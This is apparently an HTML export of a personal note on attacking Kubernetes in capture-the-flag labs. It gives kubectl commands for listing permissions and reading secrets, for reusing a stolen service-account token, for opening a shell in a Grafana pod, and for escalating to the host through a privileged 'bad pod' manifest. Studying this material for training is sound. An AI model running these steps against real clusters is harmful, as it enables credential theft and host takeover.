<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>kubernetes</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>kubernetes</h1>

      <div class="ck-content">
        <p><a href="https://kubernetes.io/docs/reference/kubectl/cheatsheet/">https://kubernetes.io/docs/reference/kubectl/cheatsheet/</a> </p>
        <p><code>kubectl get pods</code>

        </p>
        <p>You can check your permissions using <code>kubectl auth can-i --list</code>

        </p>
        <p>Kubernetes stores secret values in resources called Secrets these then
          get mounted into pods either as environment variables or files.</p>
        <p>You can use <code>kubectl</code> to list and get secrets. The content of
          the secret is stored base64 encoded.</p>
        <p><code>./kubectl get secrets</code>

        </p>
        <p><code>kubectl get secret secretflag -o 'json'</code>

        </p>
        <p>Some interesting Kubernetes objects to look for would be <code>nodes</code>,  <code>deployments</code>, <code>services</code>, <code>ingress</code>, <code>jobs</code>...
          But the service account you control does not have access to any of them.</p>
        <p>However, by default Kubernetes creates environment variables containing
          the host and port of the other services running in the cluster.</p>
        <p>Running <code>env</code> you will see there is a <code>Grafana</code> service
          running in the cluster.</p>
        <p>Kubernetes stores the token of the service account running a pod in <code>/var/run/secrets/kubernetes.io/serviceaccount/token</code>. 
           </p>
        <p>specify kubernetes config file with:</p><pre><code class="language-text-plain">KUBECONFIG=diana.kubeconfig kubectl --server https://10.10.92.76:6443 --insecure-skip-tls-verify version</code></pre><pre><code class="language-text-plain">kubectl --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list --token "$(cat token.txt)"	</code></pre><pre><code class="language-text-plain">./kubectl auth can-i --list --token=${TOKEN}

kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 -n kube-system get secret flag3 -o json | jq -r '.data | map_values(@base64d)'

./kubectl exec -it grafana-57454c95cb-v4nrk --token=${TOKEN} -- /bin/bash</code></pre>

         <h2>Namespaces</h2>

        <p><code>kubectl get namespace</code> lists all the available namespaces</p>
        <p><code>-n</code> defines the namespace to use. use <code>get secret &lt;secret_name&gt;</code> to
          get details and output it in a format yaml,json etc., to get it's value.</p>
         <h2>Nodes</h2>

        <p><code>kubectl get node</code>, to  list nodes and output in yaml,json
          for it's details.</p>
        <p>privilege escalation</p><pre><code class="language-text-plain">kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 -n default apply -f host.yaml</code></pre>

        <p>Server Side Apply helps users and controllers manage their resources through
          declarative configurations. Clients can create and modify their <a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/kubernetes-objects/">objects</a> declaratively
          by sending their fully specified intent.</p><pre><code class="language-text-plain">kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 -n default exec -it host bash</code></pre>

        <p>“host” is necessary</p>
        <p><a href="https://bishopfox.com/blog/kubernetes-pod-privilege-escalation">https://bishopfox.com/blog/kubernetes-pod-privilege-escalation</a> </p>
        <p><a href="https://github.com/BishopFox/badPods/blob/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml">https://github.com/BishopFox/badPods/blob/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml</a> </p>
        <p>The image is available in minikube's local docker registry therefore you
          just need to tell Kubernetes to use the local version instead of pulling
          it. You can achieve this by adding <code>imagePullPolicy: IfNotPresent</code> to
          your "bad" pod container. Once that is done you can run <code>kubectl apply</code> to
          create the pod.</p>
      </div>
    </div>
  </body>

</html>